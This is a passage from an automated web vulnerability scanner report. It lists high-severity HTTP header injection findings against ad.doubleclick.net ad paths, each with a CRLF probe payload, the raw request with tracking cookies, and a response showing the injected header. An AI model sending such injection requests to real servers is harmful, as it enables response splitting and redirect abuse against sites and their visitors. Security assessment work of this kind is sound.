Date: Wed, 11 May 2011 14:58:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.13. http://ad.doubleclick.net/adj/N2434.access/B5401633 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2434.access/B5401633

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8f832%0d%0af1f0aa25cbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8f832%0d%0af1f0aa25cbc/N2434.access/B5401633;sz=300x250;ord=2649916536391779493?;click=http://r.turn.com/r/tpclick/id/pcQQzAxlxiRQbQ4A_QEBAA/3c/http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DJ2YAADdmAADuUQAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=121&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8f832
f1f0aa25cbc
/N2434.access/B5401633;sz=300x250;ord=2649916536391779493:
Date: Wed, 11 May 2011 15:29:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.14. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c3a0%0d%0a6f37dca43bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c3a0%0d%0a6f37dca43bf/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c3a0
6f37dca43bf
/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892^884211^1183^0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64
Date: Wed, 11 May 2011 15:31:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.15. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 553f0%0d%0af1c17da499d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /553f0%0d%0af1c17da499d/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/553f0
f1c17da499d
/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517^884214^1236^0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64
Date: Wed, 11 May 2011 15:10:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.16. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b1e7%0d%0ad409f8817d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b1e7%0d%0ad409f8817d9/N4270.Media6Degrees.com/B5279322.3;sz=300x250;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17303119061836836|cId=5805|cb=1305127887|notifyPort=8080|exId=22|tId=17303119061836836|ec=1|secId=396|price=1.8300|pubId=526|advId=891|notifyServer=asd133.sd.pl.pvt|spId=32352|adType=ad|invId=2276|bid=1.83|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADuUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=;ord=1305127888734 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b1e7
d409f8817d9
/N4270.Media6Degrees.com/B5279322.3;sz=300x250;pc=[TPAS_ID];click0=http: //ad.media6degrees.com/adserv/clk
Date: Wed, 11 May 2011 16:06:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.17. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84906%0d%0a2503fb53c0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84906%0d%0a2503fb53c0a/N4518.z2i/B5479389.3;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84906
2503fb53c0a
/N4518.z2i/B5479389.3;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:52:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.18. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b637%0d%0ae85ff9dd1ca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b637%0d%0ae85ff9dd1ca/N4518.z2i/B5479389.4;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b637
e85ff9dd1ca
/N4518.z2i/B5479389.4;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:53:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.19. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5b67c%0d%0a3e73b45c2b7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5b67c%0d%0a3e73b45c2b7/N4518.z2i/B5479389.7;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5b67c
3e73b45c2b7
/N4518.z2i/B5479389.7;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:52:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.20. http://ad.doubleclick.net/adj/N5687.135388.BIZO/B5483330 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5687.135388.BIZO/B5483330

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24767%0d%0a0e872898a45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24767%0d%0a0e872898a45/N5687.135388.BIZO/B5483330;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/275/%2a/c%3B240571887%3B0-0%3B0%3B63465864%3B4307-300/250%3B41950541/41968328/1%3Bu%3D%2Cbzo-19844286_1305125992%2C11f8f328940989e%2CMiscellaneous%2Cbzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1%3B~sscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=5309408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24767
0e872898a45
/N5687.135388.BIZO/B5483330;sz=300x250;click=http: //ad.doubleclick.net/click;h=v8/3b04/f/275/*/c;240571887;0-0;0;63465864;4307-300/250;41950541/41968328/1;u=,bzo-19844286_1305125992,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm
Date: Wed, 11 May 2011 15:33:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.21. http://ad.doubleclick.net/adj/bnet.C0609/P0249 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bnet.C0609/P0249

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67291%0d%0ab7948c8fc55 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67291%0d%0ab7948c8fc55/bnet.C0609/P0249;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=6;tp=10;dow=nil;atf=nil;cg=30;at=10;rt=nil;af=10;il=5942;sz=300x250;tile=2;u=il-5942_ID-08131AB5FC261880B2CF7A.37395FF;ae=10;bkv30=0;grid=-1;olid=-1;ord=3624325946439057? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67291
b7948c8fc55
/bnet.C0609/P0249;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=6;tp=10;dow=nil;atf=nil;cg=30;at=10;rt=nil;af=10;il=5942;sz=300x250;tile=2;u=il-5942_ID-08131AB5FC261880B2CF7A.37395FF;ae=10;bkv30=0;grid=-1;olid=-1;ord=3624325946439057:
Date: Wed, 11 May 2011 15:47:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.22. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2bea3%0d%0aeb35bac342c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2bea3%0d%0aeb35bac342c/cm.starpulse/srb_jbl_042911;net=cm;u=,cm-88859680_1305125771,11f8f328940989e,ent,ax.340-am.h-am.b-cm.ent_h-cm.music_m-cm.weath_h-cm.sportsfan-cm.sportsreg-cm.sports_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l-idgt.gadgets_h;;srb=srb_jbl_news;cmw=owl;sz=728x90;net=cm;ord1=182235;contx=ent;an=340;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_m;btg=cm.weath_h;btg=cm.sportsfan;btg=cm.sportsreg;btg=cm.sports_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=idgt.careers_l;btg=idgt.gadgets_h;ord=681443252? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2bea3
eb35bac342c
/cm.starpulse/srb_jbl_042911;net=cm;u=,cm-88859680_1305125771,11f8f328940989e,ent,ax.340-am.h-am.b-cm.ent_h-cm.music_m-cm.weath_h-cm.sportsfan-cm.sportsreg-cm.sports_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l-idgt.gadgets:
Date: Wed, 11 May 2011 15:00:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.23. http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24848%0d%0acac0b5346fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24848%0d%0acac0b5346fb/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-6695279_1305125996,11f8f328940989e,eye,dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord1=331865;contx=eye;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.weath_h;btg=cm.sports_h;btg=mm.aa1;btg=mm.ah1;btg=mm.aj1;btg=mm.ak1;btg=mm.ar1;btg=mm.as1;btg=mm.da1;ord=935450012? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24848
cac0b5346fb
/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-6695279_1305125996,11f8f328940989e,eye,dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord1=331865;contx=eye;dc=w;btg=dx.16;btg=dx.2:
Date: Wed, 11 May 2011 15:36:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.24. http://ad.doubleclick.net/adj/sugar.tres/gallery [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugar.tres/gallery

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9bbf0%0d%0af47a72dcdb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9bbf0%0d%0af47a72dcdb5/sugar.tres/gallery;nid=16415520;sz=970x66,970x418;gid=3019466;pos=above;tile=2;ord=49966 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9bbf0
f47a72dcdb5
/sugar.tres/gallery;nid=16415520;sz=970x66,970x418;gid=3019466;pos=above;tile=2;ord=49966:
Date: Wed, 11 May 2011 14:58:29 GMT
Server: GFE/2.0
